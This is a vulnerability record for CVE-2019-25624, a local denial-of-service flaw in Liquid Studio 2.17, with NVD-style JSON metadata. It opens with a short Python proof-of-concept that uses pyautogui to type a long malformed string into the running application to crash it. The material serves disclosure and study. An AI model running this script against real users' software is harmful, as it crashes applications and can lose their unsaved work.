CVE-2019-25624

# PoC for CVE-2019-25624: Liquid Studio Denial of Service # This script generates malformed input to demonstrate the crash via keyboard interface. import pyautogui import time def trigger_dos(): print("[+] Preparing to send malformed input to Liquid Studio...") print("[!] Please ensure Liquid Studio 2.17 is running and in focus within 5 seconds.") time.sleep(5) # Example payload: Sending a long string of specific characters # The specific malformed sequence can vary based on the exact input field handling payload = "A" * 1000 + "\x00" + "\n" try: print("[+] Sending payload...") pyautogui.typewrite(payload, interval=0.01) print("[+] Payload sent. Check if the application has crashed.") except Exception as e: print(f"[-] Error during execution: {e}") if __name__ == "__main__": trigger_dos()

{"cve": {"id": "CVE-2019-25624", "sourceIdentifier": "[email protected]", "published": "2026-03-23T14:16:26.850", "lastModified": "2026-03-24T14:18:37.330", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Liquid Studio 2.17 contains a denial of service vulnerability that allows local attackers to crash the application by providing malformed input through the keyboard interface. Attackers can trigger the vulnerability by entering arbitrary characters during application runtime, causing the application to become unresponsive or terminate abnormally."}, {"lang": "es", "value": "Liquid Studio 2.17 contiene una vulnerabilidad de denegación de servicio que permite a atacantes locales hacer que la aplicación falle al proporcionar una entrada malformada a través de la interfaz del teclado. Los atacantes pueden activar la vulnerabilidad al introducir caracteres arbitrarios durante la ejecución de la aplicación, haciendo que la aplicación deje de responder o termine de forma anómala."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.9, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 6.2, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.5, "impactScore": 3.6}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-606"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:pixarra:liquid_studio:2.17:*:*:*:*:*:*:*", "matchCriteriaId": "773BCD5D-04A5-43BB-AC8E-19CB93ED6F74"}]}]}], "references": [{"url": "http://www.pixarra.com/", "source": "[email protected]", "tags": ["Product"]}, {"url": "http://www.pixarra.com/uploads/9/4/6/3/94635436/tbliquidstudio_install.exe", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.exploit-db.com/exploits/46128", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory", "VDB Entry"]}, {"url": "https://www.vulncheck.com/advisories/liquid-studio-denial-of-service-via-malformed-input", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}